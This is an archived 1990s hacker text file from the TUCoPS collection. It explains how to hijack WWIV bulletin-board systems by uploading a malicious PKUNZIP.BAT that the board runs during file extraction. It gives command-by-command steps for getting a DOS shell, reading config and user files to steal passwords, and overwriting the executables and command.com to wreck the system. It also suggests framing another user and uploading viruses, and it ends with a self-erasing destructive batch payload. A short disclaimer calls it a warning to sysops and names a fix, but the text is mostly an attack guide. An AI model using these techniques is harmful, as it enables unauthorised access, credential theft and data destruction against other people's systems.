TUCoPS :: Dialup BBSes :: wwivcrak.txt

WWIV: Hacking yourself some DOS access on a WWIV system! Kill WWIV Boards! Yah!

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

            The Crypt Keeper and The Evil Master of WCCP present:

                     Kill the lamer SysOp's computer!

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Quick Disk-laimah:
  This is provided as an educational source and it is not in any way, manner,
or form an attempt to destroy WWIV, or any WWIV boards, but serves as a 
warning to WWIV SysOps that there is a definate back door which has been
overlooked. It can be simply rescued by change the filename of PKUNZIP.EXE to
somethign else like, "UNPKZIP.EXE" or something like that, and making the
other necessary changes in INIT.

  Are you pissed off at some lamer loser SysOp who runs a WWIV board?
You are? Good. Okay, so, here's how you can make the scum really eat dog shit.

First off, this will explain how to do it. Then it will explain things to do 
when you're in DOS. Then it will explain WHY it works.

Make a batch file, call it, "PKUNZIP.BAT." In this file put down a single
line, "COMMAND". So, it should look like:
C:\>copy con pkunzip.bat
command
^Z
1 file(s) copied
C:\>
^Z is control z.
then, call up your hated sysop, make yourself a nice fake account, or, if you
wanna, you can do it yourself, but you have to cover up really well, but, it's
possible. Put the PKUNZIP.BAT into another ZIp file, or, even zip it itself.
then, UL the file. Use the extractor [e] and extract the pkunzip.bat file.
Then, chose to extract it ONE more time. the pkunzip.bat file will execute,
and if COMMAND.COM is present, then it will drop you off to dos...
More on what to do in DOS later. For now, the log will show that you have
extracted a file, and then when he wakes uyp, his computer is dead, so, this
could represent a problem here. So, here's some fun things:

When in dos, type the "CONFIG.DAT" file. a few words will print out, and a 
whole mess of "line noise." the first few words are passwords. LIke a New
User password and the System password. feel free to also type the user list
and steal everyone's passwords. maybe you can even DL it sometime later on.

If you choose to delete files, don't be a fool and type, "del *.*" or "format 
c:\" Anything in DOS that requires a "y/n" response will end your session, and
it will let the sysop know who you are. that's bad. Very bad. So, type...
C:\BBS> copy chain.txt bbs.exe
1 file(s) copied.
c:\BBS> copy chain.txt config.dat
1 file(s) copied.
C:\BBS> copy chain.txt c:\command.com
and similar statements. try to avoid deleting files, unless you remove the
directory that they were in. You can really piss people who dunno jack about
norton off by "md fuck[alt255]you" this will create a directory:
C:\FUCK YOU>
and, you can't type "RD FUCK YOU" because of the extra space. If you REALLY
hate the guy, before you shell, upload a virus or a trojan horse. when you
are in DOS, run the trojan or the virus. that wil way fuck him up.

If there is an asshole ont the board who you want to get blamed for it, go 
in and log on as him. you can attain his numbers and passwords from the 
users.lst file in the data directory of the BBS. then, after you shell to 
dos, just type, "format c:\" and it iwll stop you dead in your tracks. But, 
the SysOp will see it, and probably check who the last caller was... hehe
There are lotsa fun things you can do while in DOS, esp. since you don't care
what happens.

Why does this work? Well, when you extract a file, WWIV does a full_extern 
which will allow the user online to watch the file being extracted. If 
extractign the file DOES NOT WORK, then try  [v]IEWING a file. well, since
pkunzip.bat will be readily available, that will be ran rather than 
pkunzip.exe

Another variation of this could be to UL the file, "pkunzip.bat" - but have 
it contain somethign like:

c:
cd\bbs
copy config.dat bbs.exe
copy config.dat c:\command.com
copy chain.txt config.dat
copy chain.txt c:\bbs\data\users.lst
copy chain.txt c:\newpduls\pkunzip.bat

and, then log off.

If the SysOp doesn't notice what you've done, the next person to extract or
view a file will totally obliterate the board and it wil cover up for itself
by destroying the pkunzip.bat batch file. How sweet.

Let this be a warning to WWIV SysOps, rather than an excuse to crash all of
the WWIV boards in the world.



 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH